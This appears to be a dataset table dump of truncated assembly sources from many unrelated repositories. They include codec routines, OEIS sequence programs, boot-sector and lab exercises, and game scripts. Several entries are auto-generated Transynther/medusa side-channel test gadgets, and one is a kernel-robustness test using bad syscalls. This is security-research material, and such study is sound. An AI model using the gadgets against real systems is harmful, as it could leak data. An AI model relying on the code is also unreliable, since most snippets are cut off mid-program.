max_stars_repo_path stringlengths 3 255 | max_stars_repo_name stringlengths 5 116 | max_stars_count int64 0 107k | id stringlengths 1 7 | content stringlengths 63 1.05M |
|---|---|---|---|---|
third_party/codecs/x264/common/x86/predict-a.asm | Narflex/sagetv | 292 | 205787 | <reponame>Narflex/sagetv<gh_stars>100-1000
;*****************************************************************************
;* predict-a.asm: h264 encoder library
;*****************************************************************************
;* Copyright (C) 2005-2008 x264 project
;*
;* Authors: <NAME> <<EMAIL>>
;* ... |
app/hack/bad_operation.asm | USN484259/COFUOS | 1 | 205788 | [bits 64]
get_thread equ 0x0100
stream_state equ 0x0500
exit_process equ 0x0210
section .text
mov eax,get_thread
syscall
mov edx,eax
mov eax,stream_state
syscall
mov edx,eax
mov eax,exit_process
syscall |
Transynther/x86/_processed/NONE/_xt_/i7-7700_9_0x48_notsx.log_21829_994.asm | ljhsiun2/medusa | 9 | 205789 | <gh_stars>1-10
.global s_prepare_buffers
s_prepare_buffers:
push %r10
push %r11
push %r9
push %rax
push %rbx
push %rcx
push %rdi
push %rsi
lea addresses_WT_ht+0x33c1, %r11
nop
nop
nop
nop
xor %rax, %rax
movl $0x61626364, (%r11)
cmp $54532, %r10
lea addresses_WT_ht+0x1ce6f, %rsi
lea addresses_WC_ht+0x2eef, %rdi
nop
nop
... |
oeis/349/A349039.asm | neoneye/loda-programs | 11 | 205791 | <filename>oeis/349/A349039.asm
; A349039: Square array T(n, k) read by antidiagonals, n, k >= 0; T(n, k) = n^2 - n*k + k^2.
; Submitted by Jon Maiga
; 0,1,1,4,1,4,9,3,3,9,16,7,4,7,16,25,13,7,7,13,25,36,21,12,9,12,21,36,49,31,19,13,13,19,31,49,64,43,28,19,16,19,28,43,64,81,57,39,27,21,21,27,39,57,81,100,73,52,37,28,25,2... |
libsrc/stdio/ansi/x1/f_ansi_bel.asm | meesokim/z88dk | 0 | 205792 | <filename>libsrc/stdio/ansi/x1/f_ansi_bel.asm
;
; ANSI Video handling for the Sharp X1
;
; BEL - chr(7) Beep it out
;
;
; $Id: f_ansi_bel.asm,v 1.5 2015/01/19 01:33:19 pauloscustodio Exp $
;
PUBLIC ansi_BEL
.BEPDAT
defw 142 ; C channel frequency: 880Hz
defb @00111011 ; IO/Noise/tone: B|A|C|B|A|C|B|A
defb... |
oeis/184/A184107.asm | neoneye/loda-programs | 11 | 205793 | ; A184107: n-1+ceiling((n/6)^2); complement of A184106.
; Submitted by <NAME>(s1)
; 1,2,3,4,5,6,8,9,11,12,14,15,17,19,21,23,25,26,29,31,33,35,37,39,42,44,47,49,52,54,57,60,63,66,69,71,75,78,81,84,87,90,94,97,101,104,108,111,115,119,123,127,131,134,139,143,147,151,155,159,164,168,173,177,182,186,191,196,201,206
mov $1,... |
programs/fisher.asm | CH-Electronics/chos | 312 | 205794 | ;=====================================================================
;
; Deep Sea Fisher
;
; Written by <NAME> (<EMAIL>)
; Version 1.0
;
; Try to Catch as many fish as possible before loosing all 10 hooks
;
; The behavior of a fish can be altered by changing the behavior
; byte bit mask... |
programs/oeis/060/A060828.asm | neoneye/loda | 22 | 205795 | ; A060828: Size of the Sylow 3-subgroup of the symmetric group S_n.
; 1,1,1,3,3,3,9,9,9,81,81,81,243,243,243,729,729,729,6561,6561,6561,19683,19683,19683,59049,59049,59049,1594323,1594323,1594323,4782969,4782969,4782969,14348907,14348907,14348907,129140163,129140163,129140163,387420489,387420489,387420489,1162261467,11... |
oeis/158/A158485.asm | neoneye/loda-programs | 11 | 205796 | <gh_stars>10-100
; A158485: a(n) = 14*n^2 - 1.
; Submitted by <NAME>
; 13,55,125,223,349,503,685,895,1133,1399,1693,2015,2365,2743,3149,3583,4045,4535,5053,5599,6173,6775,7405,8063,8749,9463,10205,10975,11773,12599,13453,14335,15245,16183,17149,18143,19165,20215,21293,22399,23533,24695,25885,27103,28349,29623,30925,322... |
programs/oeis/249/A249910.asm | karttu/loda | 0 | 205797 | <reponame>karttu/loda<gh_stars>0
; A249910: Digital root of A003500(n).
; 2,4,5,7,5,4,2,4,5,7,5,4,2,4,5,7,5,4,2,4,5,7,5,4,2,4,5,7,5,4,2,4,5,7,5,4,2,4,5,7,5,4,2,4,5,7,5,4,2,4,5,7,5,4,2,4,5,7,5,4,2,4,5,7,5,4,2,4,5,7,5,4,2,4,5,7,5,4,2,4,5,7,5,4,2,4,5,7,5,4,2,4,5,7,5,4,2,4,5,7,5,4
gcd $0,6
mov $1,2
trn $1,$0
mov $2,$0
add... |
programs/oeis/088/A088211.asm | jmorken/loda | 1 | 205798 | <filename>programs/oeis/088/A088211.asm
; A088211: Denominators of convergents of the continued fraction with the n+1 partial quotients: [2;2,2,...(n 2's)...,2,n+1], starting with [1], [2;2], [2;2,3], [2;2,2,4], ...
; 1,2,7,22,65,186,519,1422,3841,10258,27143,71270,185921,482314,1245191,3201182,8199169,20931234,5327667... |
oeis/049/A049390.asm | neoneye/loda-programs | 11 | 205799 | ; A049390: Expansion of (1-25*x)^(4/5).
; Submitted by <NAME>
; 1,-20,-50,-500,-6875,-110000,-1925000,-35750000,-692656250,-13853125000,-283989062500,-5937953125000,-126181503906250,-2717755468750000,-59208244140625000,-1302581371093750000
mul $0,2
mov $1,1
mov $2,4
mov $3,$0
mov $4,5
lpb $3
mul $1,$2
mul $1,$4
... |
externals/mpir-3.0.0/mpn/x86_64w/nehalem/sub_err1_n.asm | JaminChan/eos_win | 12 | 205800 | <reponame>JaminChan/eos_win<gh_stars>10-100
; PROLOGUE(mpn_sub_err1_n)
; Copyright 2009 <NAME>
;
; Windows Conversion Copyright 2008 <NAME>
;
; This file is part of the MPIR Library.
;
; The MPIR Library is free software; you can redistribute it and/or modify
; it under the terms of the GNU Lesser General Public ... |
code/Forec/t25.asm | KongoHuster/assembly-exercise | 1 | 205802 | ;; last edit date: 2016/10/25
;; author: Forec
;; LICENSE
;; Copyright (c) 2015-2017, Forec <<EMAIL>>
;; Permission to use, copy, modify, and/or distribute this code for any
;; purpose with or without fee is hereby granted, provided that the above
;; copyright notice and this permission notice appear in all copies.
;... |
08/FunctionCalls/SimpleFunction/SimpleFunction.asm | mikysett/nand2tetris | 0 | 205803 | <reponame>mikysett/nand2tetris
(SimpleFunction.test)
@SP
M=M+1
A=M-1
M=0
@SP
M=M+1
A=M-1
M=0
@LCL
D=M
@0
A=D+A
D=M
@SP
M=M+1
A=M-1
M=D
@LCL
D=M
@1
A=D+A
D=M
@SP
M=M+1
A=M-1
M=D
@SP
AM=M-1
D=M
@SP
A=M-1
M=M+D
@SP
A=M-1
M=!M
@ARG
D=M
@0
A=D+A
D=M
@SP
M=M+1
A=M-1
M=D
@SP
AM=M-1
D=M
@SP
A=M-1
M=M+D
@ARG
D=M
@1
A=D+A
D=M
@S... |
scripts/silphco5.asm | adhi-thirumala/EvoYellow | 16 | 205804 | SilphCo5Script:
call SilphCo5Script_19f4d
call EnableAutoTextBoxDrawing
ld hl, SilphCo5TrainerHeaders
ld de, SilphCo5ScriptPointers
ld a, [wSilphCo5CurScript]
call ExecuteCurMapScriptInTable
ld [wSilphCo5CurScript], a
ret
SilphCo5Script_19f4d:
ld hl, wCurrentMapScriptFlags
bit 5, [hl]
res 5, [hl]
ret z
ld... |
strlen.asm | thlorenz/lib.asm | 12 | 205807 | <filename>strlen.asm
; vim: ft=nasm
section .text
; --------------------------------------------------------------
; strlen
; determines length of given string (not counting the 0 terminator)
;
; args: esi = address of the string whose length to determine
; string needs to end with 0 terminator (ala C st... |
Transynther/x86/_processed/AVXALIGN/_zr_/i7-7700_9_0xca.log_21829_774.asm | ljhsiun2/medusa | 9 | 205808 | .global s_prepare_buffers
s_prepare_buffers:
push %r10
push %r11
push %r13
push %r8
push %r9
push %rbp
push %rcx
push %rdi
push %rsi
lea addresses_UC_ht+0xaba4, %r8
nop
nop
nop
nop
nop
and $38512, %r9
mov (%r8), %r10
nop
nop
nop
nop
nop
inc %r13
lea addresses_D_ht+0x105e0, %rbp
nop
nop
nop
nop
nop
cmp %r11, %r11
mov (%... |
Source/Assembly.asm | WOCyo/Telegram-Anti-Revoke | 1 | 205809 | <filename>Source/Assembly.asm
ifdef PLATFORM_X86
.model flat, c
endif
.code
; externals
;
extern Proxy_Initialize: proc
; pushall & popall macros
;
pushall macro
ifdef PLATFORM_X86
pushad
elseifdef PLATFORM_X64
push rax
push rcx
push rdx
push rbx
push r... |
hitcon2019_qual/emojivm/pwn/solution/pwn.asm | bruce30262/CTF_challenge_public | 13 | 205810 | <filename>hitcon2019_qual/emojivm/pwn/solution/pwn.asm
# tool/assembler.py pwn.asm pwn.evm
# make libc appear in heap
pushnum 1032
new
push 0
del
# create gptr[0]
pushnum 24
new
# stack underflow
add
pop
pop
pop
pop
pop
pop
pop
pop
pop
pop
# modify gptr[0] to leak libc
push 8
add
push 0
WB
# modify gptr[0] to leak heap... |
Kernel/asm/libasm.asm | gbarbieripederiva/TP2_So | 0 | 205811 | GLOBAL cpuVendor
section .text
cpuVendor:
push rbp
mov rbp, rsp
push rbx
mov rax, 0
cpuid
mov [rdi], ebx
mov [rdi + 4], edx
mov [rdi + 8], ecx
mov byte [rdi+13], 0
mov rax, rdi
pop rbx
mov rsp, rbp
pop rbp
ret
;--------------------------------Sounds-------------------------------------------... |
Modul 2/latih5.asm | hyuwah/fu-praktikum-smd | 0 | 205812 | ;-------------------------------------------------------------------------------
; Praktikum SMD 2015
; M.Wahyudin (140310120031)
;
; Name : LATIH5.ASM
; Desc : Counter P1 dari 0 hingga 255 dengan Delay
; PB toggle pseudo ops
; Input : Pushbutton di P3.0 (toggle)
; Output: LED P1
;---------------------------... |
libsrc/_DEVELOPMENT/adt/bv_stack/z80/asm_bv_stack_shrink_to_fit.asm | meesokim/z88dk | 0 | 205813 | <filename>libsrc/_DEVELOPMENT/adt/bv_stack/z80/asm_bv_stack_shrink_to_fit.asm<gh_stars>0
; ===============================================================
; Feb 2014
; ===============================================================
;
; int bv_stack_shrink_to_fit(bv_stack_t *s)
;
; Release any excess memory allocated ... |
libsrc/math/genmath/ufloat.asm | andydansby/z88dk-mk2 | 1 | 205814 | <reponame>andydansby/z88dk-mk2
; Generic Small C+ Floating point library
; Converts integer in hl to fp number
XLIB ufloat
LIB float
XREF float1
;
; convert the integer in hl to (unsigned routine)
; a floating point number in FA
;... |
programs/oeis/215/A215054.asm | karttu/loda | 1 | 205815 | <filename>programs/oeis/215/A215054.asm
; A215054: a(n) = 1/11*(binomial(n,11) - floor(n/11)).
; 1,7,33,124,397,1125,2893,6871,15269,32065,64130,122916,226922,405218,702378,1185263,1952198,3145208,4966118,7697483,11729498,17594247,26008887,37929627,54618663,77726559,109392935,152368731,210163767,287223815,389141943
mo... |
oeis/241/A241522.asm | neoneye/loda-programs | 11 | 205816 | ; A241522: The number of P-positions in the game of Nim with up to 4 piles, allowing for piles of zero, such that the number of objects in each pile does not exceed n.
; Submitted by <NAME>
; 1,8,21,64,89,168,301,512,561,712,965,1344,1801,2408,3165,4096,4193,4488,4981,5696,6585,7720,9101,10752,12433,14408,16677,19264,2... |
Transynther/x86/_processed/NONE/_xt_/i9-9900K_12_0xca.log_21829_1611.asm | ljhsiun2/medusa | 9 | 205817 | .global s_prepare_buffers
s_prepare_buffers:
push %r10
push %r12
push %r9
push %rbp
push %rcx
push %rdi
push %rdx
push %rsi
lea addresses_normal_ht+0xa994, %rsi
lea addresses_WC_ht+0x80e0, %rdi
nop
nop
nop
nop
add $4146, %r9
mov $77, %rcx
rep movsq
nop
nop
dec %rbp
lea addresses_normal_ht+0x193a8, %rdx
nop
nop
nop
sub ... |
src/tfdisk/tfdisk.asm | neri/osz | 7 | 205818 | ;;
;; TinyFDISK for MEG-OS
;;
;; Copyright (c) 1998-2015, MEG-OS project
;; All rights reserved.
;;
;; Redistribution and use in source and binary forms, with or without modification,
;; are permitted provided that the following conditions are met:
;;
;; * Redistributions of source code must retain the above copyright ... |
pic.asm | dzaninov/hex2pic | 0 | 205819 | #define PIC_ASM
#include "pic.inc"
#ifdef __16F88
__CONFIG _CONFIG1, _FOSC_INTOSCIO & _WDTE_OFF & _PWRTE_ON & _MCLRE_OFF & _BOREN_OFF & _LVP_OFF & _CPD_OFF & _WRT_OFF & _CCPMX_RB0 & _CP_OFF
__CONFIG _CONFIG2, _FCMEN_OFF & _IESO_OFF
#endif
#ifdef __16F887
__CONFIG _CONFIG1, _FOSC_INTRC_NOCLKOUT & _WDTE_OFF... |
oeis/180/A180968.asm | neoneye/loda-programs | 11 | 205821 | <gh_stars>10-100
; A180968: The only integers that cannot be partitioned into a sum of six positive squares.
; Submitted by <NAME>
; 1,2,3,4,5,7,8,10,11,13,16,19
lpb $0
add $1,1
mov $2,$0
add $0,1
div $0,7
seq $2,188551 ; Numbers located at angle turns in a pentagonal spiral.
sub $2,$1
mov $1,2
add $3,... |
programs/oeis/111/A111587.asm | jmorken/loda | 1 | 205823 | <gh_stars>1-10
; A111587: a(n) = 2*a(n-1) + 2*a(n-3) + a(n-4), a(0) = 1, a(1) = 4, a(2) = 9, a(3) = 20.
; 1,4,9,20,49,120,289,696,1681,4060,9801,23660,57121,137904,332929,803760,1940449,4684660,11309769,27304196,65918161,159140520,384199201,927538920,2239277041,5406093004,13051463049,31509019100,76069501249,18364802160... |
programs/oeis/055/A055273.asm | karttu/loda | 0 | 205824 | <filename>programs/oeis/055/A055273.asm
; A055273: a(n) = 3*a(n-1) - a(n-2) with a(0) = 1, a(1) = 8.
; 1,8,23,61,160,419,1097,2872,7519,19685,51536,134923,353233,924776,2421095,6338509,16594432,43444787,113739929,297775000,779585071,2040980213,5343355568,13989086491,36623903905,95882625224,251023971767,657189290077,172... |
oeis/217/A217029.asm | neoneye/loda-programs | 11 | 205825 | <filename>oeis/217/A217029.asm
; A217029: Array T(i,j) read by antidiagonals, where T(i,j) is the height of i/j, that is max(|m|,|n|) with m/n = i/j and gcd(m, n) = 1.
; Submitted by <NAME>
; 1,2,2,3,1,3,4,3,3,4,5,2,1,2,5,6,5,4,4,5,6,7,3,5,1,5,3,7,8,7,2,5,5,2,7,8,9,4,7,3,1,3,7,4,9,10,9,8,7,6,6,7,8,9,10,11,5,3,2,7,1,7,2... |
oeis/142/A142314.asm | neoneye/loda-programs | 11 | 205826 | <reponame>neoneye/loda-programs
; A142314: Primes congruent to 4 mod 45.
; Submitted by <NAME>
; 139,229,409,499,769,859,1039,1129,1399,1489,1579,1669,1759,2029,2389,2659,2749,3019,3109,3469,3559,3739,3919,4099,4549,4639,4729,4909,4999,5179,5449,6079,6529,6619,6709,7069,7159,7699,7789,7879,8059,8329,8419,8599,8689,8779... |
oeis/146/A146091.asm | neoneye/loda-programs | 11 | 205827 | ; A146091: a(n) = 3*A146085(n) - 2.
; Submitted by <NAME>(w1)
; 1,10,19,82,91,100,163,172,181,730,739,748,811,820,829,892,901,910,1459,1468,1477,1540,1549,1558,1621,1630,1639,6562,6571,6580,6643,6652,6661,6724,6733,6742,7291,7300,7309,7372,7381,7390,7453,7462,7471,8020,8029,8038,8101,8110,8119
mov $3,1
lpb $0
mov $2... |
optests/gbhw.asm | joeldipops/SuperTestBoy | 1 | 205828 | <gh_stars>1-10
;*
;* GBHW.INC - Gameboy Hardware definitions for GALP
;*
;* by GABY. Inspired from work done by <NAME> & others.
;*
;* V1.0 - The original version
;*
; If all of these are already defined, don't do it again.
IF !DEF(HARDWARE_INC)
HARDWARE_INC SET 1
rev_Check_hardware_inc: ... |
Transynther/x86/_processed/NC/_zr_/i7-8650U_0xd2_notsx.log_11355_206.asm | ljhsiun2/medusa | 9 | 205829 | <filename>Transynther/x86/_processed/NC/_zr_/i7-8650U_0xd2_notsx.log_11355_206.asm<gh_stars>1-10
.global s_prepare_buffers
s_prepare_buffers:
push %r11
push %r13
push %r8
push %r9
push %rbx
push %rcx
push %rdi
push %rsi
lea addresses_UC_ht+0x17f08, %r13
nop
nop
cmp %r9, %r9
movb $0x61, (%r13)
nop
nop
add $41568, %rsi
l... |
programs/oeis/304/A304379.asm | neoneye/loda | 22 | 205830 | <reponame>neoneye/loda<filename>programs/oeis/304/A304379.asm
; A304379: a(n) = 256n^2 - 828n + 656 (n>=1).
; 84,24,476,1440,2916,4904,7404,10416,13940,17976,22524,27584,33156,39240,45836,52944,60564,68696,77340,86496,96164,106344,117036,128240,139956,152184,164924,178176,191940,206216,221004,236304,252116,268440,28527... |
data/hide_show_data.asm | adhi-thirumala/EvoYellow | 0 | 205831 | <reponame>adhi-thirumala/EvoYellow
; data for default hidden/shown
; objects for each map ($00-$F8)
; Table of 2-Byte pointers, one pointer per map,
; goes up to Map_F7, ends with $FFFF.
; points to table listing all missable object in the area
MapHSPointers:
dw MapHS00
dw MapHS01
dw MapHS02
dw MapHS03
dw MapHSXX... |
Transynther/x86/_processed/NONE/_xt_/i9-9900K_12_0xa0.log_21829_1224.asm | ljhsiun2/medusa | 9 | 205833 | <reponame>ljhsiun2/medusa<filename>Transynther/x86/_processed/NONE/_xt_/i9-9900K_12_0xa0.log_21829_1224.asm
.global s_prepare_buffers
s_prepare_buffers:
push %r11
push %r12
push %r9
push %rax
push %rbx
push %rcx
push %rdi
push %rsi
lea addresses_normal_ht+0x6cd6, %rsi
lea addresses_normal_ht+0x6276, %rdi
nop
dec %r9
mo... |
oeis/001/A001370.asm | neoneye/loda-programs | 11 | 205834 | ; A001370: Sum of digits of 2^n.
; Submitted by <NAME>(s3.)
; 1,2,4,8,7,5,10,11,13,8,7,14,19,20,22,26,25,14,19,29,31,26,25,41,37,29,40,35,43,41,37,47,58,62,61,59,64,56,67,71,61,50,46,56,58,62,70,68,73,65,76,80,79,77,82,92,85,80,70,77,82,74,85,89,88,86,109,110,103,89,70,86,109,110,130,125,106,104,100,110,112,107,124,122... |
memory/echo_ram_write/init.asm | AntonioND/gbc-hw-tests | 6 | 205835 |
INCLUDE "hardware.inc"
SECTION "PATTERNS",HOME
PATTERN_SIZE EQU (4*4*4*4)
PATTERN_1:
REPT 4*4*4
DB $FF
DB $F0
DB $0F
DB $00
ENDR
PATTERN_4:
REPT 4*4
REPT 4
DB $FF
ENDR
REPT 4
DB $F0
ENDR
REPT 4
DB $0F
ENDR
REPT 4
DB $00
ENDR
ENDR
PATTERN_16:
REPT 4
REPT 16
DB $FF
ENDR
REPT 16
DB $F0
ENDR... |
Appl/GeoDex/Main/mainManager.asm | steakknife/pcgeos | 504 | 205836 | <filename>Appl/GeoDex/Main/mainManager.asm
COMMENT @----------------------------------------------------------------------
Copyright (c) GeoWorks 1988 -- All Rights Reserved
PROJECT: PC GEOS
MODULE: GeoDex/Main
FILE: mainManager.asm
REVISION HISTORY:
Name Date Description
---- ---- -----------
ted... |
oeis/003/A003816.asm | neoneye/loda-programs | 11 | 205837 | ; A003816: a(0) = 0, a(n) = a(n-1) XOR -n.
; 0,1,-1,4,0,5,-1,8,0,9,-1,12,0,13,-1,16,0,17,-1,20,0,21,-1,24,0,25,-1,28,0,29,-1,32,0,33,-1,36,0,37,-1,40,0,41,-1,44,0,45,-1,48,0,49,-1,52,0,53,-1,56,0,57,-1,60,0,61,-1,64,0,65,-1,68
mov $2,-2
bin $2,$0
add $0,259445
lpb $2
pow $2,0
div $2,2
lpe
lpb $0
mod $0,4
lpe
div... |
oeis/262/A262062.asm | neoneye/loda-programs | 11 | 205839 | <filename>oeis/262/A262062.asm
; A262062: The first of six consecutive positive integers the sum of the squares of which is equal to the sum of the squares of seven consecutive positive integers.
; Submitted by <NAME>(s1.)
; 85,2269,58969,1530985,39746701,1031883301,26789219185,695487815569,18055893985669,4687577558118... |
maps/Route2.asm | Ebernacher90/pokecrystal-allworld | 0 | 205841 | <filename>maps/Route2.asm
object_const_def ; object_event constants
const ROUTE2_BUG_CATCHER1
const ROUTE2_BUG_CATCHER2
const ROUTE2_BUG_CATCHER3
const ROUTE2_POKE_BALL1
const ROUTE2_POKE_BALL2
const ROUTE2_POKE_BALL3
const ROUTE2_POKE_BALL4
const ROUTE2_FRUIT_TREE
Route2_MapScripts:
db 0 ; scene scripts
d... |
ioq3/build/release-js-js/baseq3/ui/ui_players.asm | RawTechnique/quake-port | 1 | 205842 | code
proc UI_PlayerInfo_SetWeapon 84 12
ADDRFP4 0
ADDRFP4 0
INDIRP4
ASGNP4
ADDRFP4 4
ADDRFP4 4
INDIRI4
ASGNI4
ADDRFP4 0
INDIRP4
CNSTI4 1056
ADDP4
ADDRFP4 4
INDIRI4
ASGNI4
LABELV $69
ADDRFP4 0
INDIRP4
CNSTI4 1120
ADDP4
ADDRFP4 4
INDIRI4
ASGNI4
ADDRFP4 0
INDIRP4
CNSTI4 988
ADDP4
CNSTI4 0
ASGNI4
ADDRFP4 0
INDIRP4
CNSTI4 9... |
Directory_Structure/Projects/lh5801_examples/blockInvert2.lh5801.asm | Jeff-Birt/TASM_vsCode_Extension | 4 | 205843 | ; Block invert 2, Program to invert screen one column at a time
; In this version we try to deal with the screwy screen mapping
; You can use the BASIC loader below to POKE it into memory, and RUN it
; Compare assembled program to BASIC loader values
; Program inspired by Pocket Computer Newsletter, Machine Language Pr... |
Library/Chart/Series/seriesUtils.asm | steakknife/pcgeos | 504 | 205844 | COMMENT @%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
Copyright (c) GeoWorks 1992 -- All Rights Reserved
PROJECT: PC GEOS
MODULE:
FILE: seriesUtils.asm
AUTHOR: <NAME>
METHODS:
Name Description
---- -----------
FUNCTIONS:
Scope Name Description
----- ---- ----------... |
vbox/src/VBox/Runtime/r0drv/nt/nt3fakesA-r0drv-nt.asm | Nurzamal/rest_api_docker | 0 | 205845 | ; $Id: nt3fakesA-r0drv-nt.asm 70381 2017-12-29 10:41:04Z vboxsync $
;; @file
; IPRT - Companion to nt3fakes-r0drv-nt.cpp that provides import stuff to satisfy the linker.
;
;
; Copyright (C) 2006-2017 Oracle Corporation
;
; This file is part of VirtualBox Open Source Edition (OSE), as
; available from http://www.virtu... |
Library/Pref/Preffax2/preffax2ItemGroupSpecial.asm | steakknife/pcgeos | 504 | 205846 | <gh_stars>100-1000
COMMENT @%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
Copyright (c) Geoworks 1995 -- All Rights Reserved
PROJECT: Tiramisu
MODULE: Preferences
FILE: preffax2ItemGroupSpecial.asm
AUTHOR: <NAME>, Mar 15, 1995
ROUTINES:
Name Description
---- -----------... |
mult.asm | TheDoebes/mips-assembly-adventure | 0 | 205847 | .data
.text
addi $t0, $zero, 2000
addi $t1, $zero, 10
mult $t0, $t1 #two-register multiplication of 2000 and 10
#the results are large, so the product is stored in lo and hi regs
mflo $s0
mfhi $s1 #not used here
#display result
li $v0, 1
add $a0, $zero, $s0
syscall |
programs/oeis/183/A183299.asm | karttu/loda | 0 | 205850 | <reponame>karttu/loda
; A183299: Complement of A005563.
; 1,2,4,5,6,7,9,10,11,12,13,14,16,17,18,19,20,21,22,23,25,26,27,28,29,30,31,32,33,34,36,37,38,39,40,41,42,43,44,45,46,47,49,50,51,52,53,54,55,56,57,58,59,60,61,62,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,81,82,83,84,85,86,87,88
mov $1,$0
lpb $1,1
add $0,... |
fluidcore/samples/sq50-v4.asm | bushy555/ZX-Spectrum-1-Bit-Routines | 59 | 205851 | <reponame>bushy555/ZX-Spectrum-1-Bit-Routines
db 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0
db 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0
db 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0
db 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0
db 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0
db 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0
db 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0
db 0,0,0,0,0,0,0,0... |
ASS3/insertion_sort (q2).asm | rahulkumawat1/NASM | 0 | 205853 | <reponame>rahulkumawat1/NASM<gh_stars>0
section .data
tab: db '',9
l: equ $-tab
newline: db '',10
l1: equ $-newline
section .bss
just_read: resd 1
just_print: resd 1
temp: resd 1
counter: resd 1
zero: resd 1
n: resd 1
arr: resd 50
key: resd 1
i: resd 1
j: resd 1
section .text
global _start:
_start:
call read_num
mo... |
Transynther/x86/_processed/NONE/_xt_sm_/i7-8650U_0xd2.log_458_1181.asm | ljhsiun2/medusa | 9 | 205854 | .global s_prepare_buffers
s_prepare_buffers:
push %r11
push %r14
push %r15
push %r8
push %rcx
push %rdi
push %rdx
push %rsi
lea addresses_WT_ht+0x1ee2, %rsi
lea addresses_A_ht+0x1ad92, %rdi
nop
nop
xor $13102, %r14
mov $33, %rcx
rep movsq
cmp %r15, %r15
lea addresses_normal_ht+0x1e622, %rdx
nop
cmp %r15, %r15
movw $0x6... |
libsrc/_DEVELOPMENT/l/sccz80/8-gbz80/f48/dpush2.asm | ahjelm/z88dk | 640 | 205855 |
SECTION code_clib
SECTION code_l_sccz80
PUBLIC dpush2
EXTERN fa
;------------------------------------------------------
; Push FA onto stack under ret address and stacked word
;------------------------------------------------------
dpush2: pop de ;save return address
pop bc ;sav... |
02-bootsector-print/boot_sect_hello.asm | smartdone/os-tutorial | 1 | 205856 | <filename>02-bootsector-print/boot_sect_hello.asm
mov ah, 0x0e ; tty mode
mov al, 'H'
int 0x10
mov al, 'e'
int 0x10
mov al, 'l'
int 0x10
int 0x10 ; 'l' is still on al, remember?
mov al, 'o'
int 0x10
mov al, ','
int 0x10
mov al, 'w'
int 0x10
mov al, 'o'
int 0x10
mov al, 'r'
int 0x10
mov al, 'l'
int 0x10
mov al, 'd'
int ... |
lab_03/lab3_2/lr03_2_2.asm | MrLIVB/BMSTU_MDPL | 0 | 205857 | <filename>lab_03/lab3_2/lr03_2_2.asm<gh_stars>0
SD1 SEGMENT para common 'DATA'
C1 LABEL byte
ORG 1h
C2 LABEL byte
SD1 ENDS
CSEG SEGMENT para 'CODE'
ASSUME CS:CSEG, DS:SD1
main:
mov ax, SD1
mov dx`s, ax
mov ah, 2
mov dl, C1
int 21h
mov dl, C2
int 21h
mov ax, 4c00h
int 21h
CSEG ENDS
END main |
Second course/4th semester/Assembler/Lab7/u_hex.asm | tekcellat/University | 0 | 205859 | <gh_stars>0
PUBLIC M_u_hex
Data SEGMENT PUBLIC
List DB "qwertyuiopasdfghj"
Data ENDS
CodeSeg SEGMENT PUBLIC
ASSUME CS:CodeSeg
M_u_hex PROC NEAR
Begin:
PUSH BP
MOV BP,SP
PUSH BX
MOV CX, 4
MOV BX,[BP+4]
MOV AX, 0
Loop1:
MOV AL, BH
SHR ... |
programs/oeis/073/A073188.asm | karttu/loda | 0 | 205860 | <gh_stars>0
; A073188: n appears 1+[n/3] times.
; 0,1,2,3,3,4,4,5,5,6,6,6,7,7,7,8,8,8,9,9,9,9,10,10,10,10,11,11,11,11,12,12,12,12,12,13,13,13,13,13,14,14,14,14,14,15,15,15,15,15,15,16,16,16,16,16,16,17,17,17,17,17,17,18,18,18,18,18,18,18,19,19,19,19,19,19,19,20,20,20,20,20,20,20,21,21,21,21,21,21,21,21,22,22,22,22,22,2... |
oeis/007/A007307.asm | neoneye/loda-programs | 11 | 205861 | <reponame>neoneye/loda-programs
; A007307: a(n) = a(n-2) + a(n-3).
; Submitted by <NAME>
; 0,1,2,1,3,3,4,6,7,10,13,17,23,30,40,53,70,93,123,163,216,286,379,502,665,881,1167,1546,2048,2713,3594,4761,6307,8355,11068,14662,19423,25730,34085,45153,59815,79238,104968,139053,184206,244021,323259,428227,567280,751486,995507,1... |
programs/oeis/127/A127982.asm | karttu/loda | 0 | 205862 | ; A127982: Numbers of the form (n - 1/3)2^(n) - n/2 + 1/4 + (-1)^n/12.
; 1,6,20,57,147,360,850,1959,4433,9894,21840,47781,103759,223908,480590,1026723,2184525,4631202,9786700,20621985,43341131,90876576,190141770,397060767,827675977,1722460830,3579139400,7426714269,15390299463,31854340764,65856165190,136007297691,280604... |
nasm assembly/library/reverse_sentence.asm | AI-Factor-y/NASM-library | 0 | 205864 |
reverse_sentence:
;; usage
;--------
;; 1: the input string should be in ebx , length of the string in string_len
;; 2: reversed sentence string in "reversed_sentence_val"
;; 3: length of the reversed sentence in "reversed_sent_count"
;; 4: subprocedures used are "reverse_string_modified_for_sent"
section .bs... |
CS0447/Lab3/led_keypad.asm | jasonawalker/pitt-cs | 0 | 205866 |
# MMIO Registers
.eqv DISPLAY_CTRL 0xFFFF0000
.eqv DISPLAY_KEYS 0xFFFF0004
.eqv DISPLAY_BASE 0xFFFF0008
# Display stuff
.eqv DISPLAY_W 64
.eqv DISPLAY_H 64
.eqv DISPLAY_W_SHIFT 6
# LED Colors
.eqv COLOR_BLACK 0
.eqv COLOR_RED 1
.eqv COLOR_ORANGE 2
.eqv COLOR_YELLOW 3
.eqv COLOR_GREEN 4
.e... |
libsrc/osca/flos_paper.asm | grancier/z180 | 0 | 205867 | ;
; Old School Computer Architecture - interfacing FLOS
; <NAME>, 2011
;
; Set paper color
;
; $Id: flos_paper.asm,v 1.3 2016/06/22 22:13:09 dom Exp $
;
INCLUDE "flos.def"
SECTION code_clib
PUBLIC flos_paper
PUBLIC _flos_paper
flos_paper:
_flos_paper:
ld b,h
ld c,l
ld d,h
ld e,l
jp kjt_backgroun... |
oeis/101/A101853.asm | neoneye/loda-programs | 11 | 205870 | ; A101853: a(n) = n*(20+15*n+n^2)/6.
